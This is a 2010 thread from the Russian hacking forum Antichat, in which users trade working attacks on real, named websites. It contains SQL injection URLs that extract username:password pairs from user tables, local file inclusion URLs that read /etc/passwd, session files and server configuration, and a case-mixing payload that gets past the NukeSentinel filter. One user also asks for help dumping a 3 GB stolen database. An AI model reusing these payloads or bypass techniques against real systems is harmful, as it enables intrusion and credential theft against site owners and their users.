ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12581  
Старый 15.04.2010, 21:07
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

net ti zdelal concat_ws%28 username,0x3a,password%29

a vidimo tolko :jmvN/m90uBX8OHg

a eto sto login ili parol ?? a zacem tolko eto ?
 
Ответить с цитированием

  #12582  
Старый 15.04.2010, 21:09
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

ааааа

http://www.venen-kur.info/index.php?id=1319&lang=1+and+1=0+%20Union%20Select %20%20concat_ws%280x3a,username,0x3a,password%29,2 ,3,4%20from%20%20user_users--

я те ща в пм скину че там))
 
Ответить с цитированием

  #12583  
Старый 15.04.2010, 21:12
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

ok ponyatno..pasiba..
 
Ответить с цитированием

  #12584  
Старый 16.04.2010, 06:24
Аватар для Keltos
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Помогите плиз:
Вот php инъекция:
Код:
http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16
нашел там PHPSESSID он там j7h4hqb6d43c1f0e3bc84volf6
вбиваю
Код:
http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../tmp/sess_j7h4hqb6d43c1f0e3bc84volf6
ничего нет

в какой еще директории может быть файл сессии?
 
Ответить с цитированием

  #12585  
Старый 16.04.2010, 06:58
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Лучше вот это поизучай:
Код:
http://www.partnersinpreservation.com/boston/index.php?sec=/proc/self/status%00

http://www.partnersinpreservation.com/boston/index.php?sec=/etc/httpd/conf/httpd.conf%00

http://www.partnersinpreservation.com/boston/index.php?sec=/proc/version%00
https://forum.antichat.net/showpost.php?p=1088072&postcount=11

Последний раз редактировалось Pashkela; 16.04.2010 в 07:05..
 
Ответить с цитированием

  #12586  
Старый 16.04.2010, 19:32
Аватар для durito
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

стандартная скуль

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220% 27

но union и select режется модулем NukeSentinel

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+ and+substring%28version%28%29,1,1%29=5

в подзапросах также режется select

как обойти?
 
Ответить с цитированием

  #12587  
Старый 16.04.2010, 19:56
Аватар для nemaniak
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

Цитата:
Сообщение от durito  
стандартная скуль

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220% 27

но union и select режется модулем NukeSentinel

http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+ and+substring%28version%28%29,1,1%29=5

в подзапросах также режется select

как обойти?
Например так

Код:
http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=-220+unIoN+SeLeCt+1,2+--+
 
Ответить с цитированием

  #12588  
Старый 16.04.2010, 23:32
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Кто может дать хорший и мощный скрипт што бы дамп БД на 3 гига слить, а то ошибки выдает с такими размерами!!
 
Ответить с цитированием

  #12589  
Старый 16.04.2010, 23:37
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

GOGA075,
Sypex Dumper скачай
 
Ответить с цитированием

  #12590  
Старый 16.04.2010, 23:44
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

jecka3000, вот как раз он то и выдает ошибки!!!
Что 1.0.8b и 2.0.6
несправляються с такими обьемами!!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ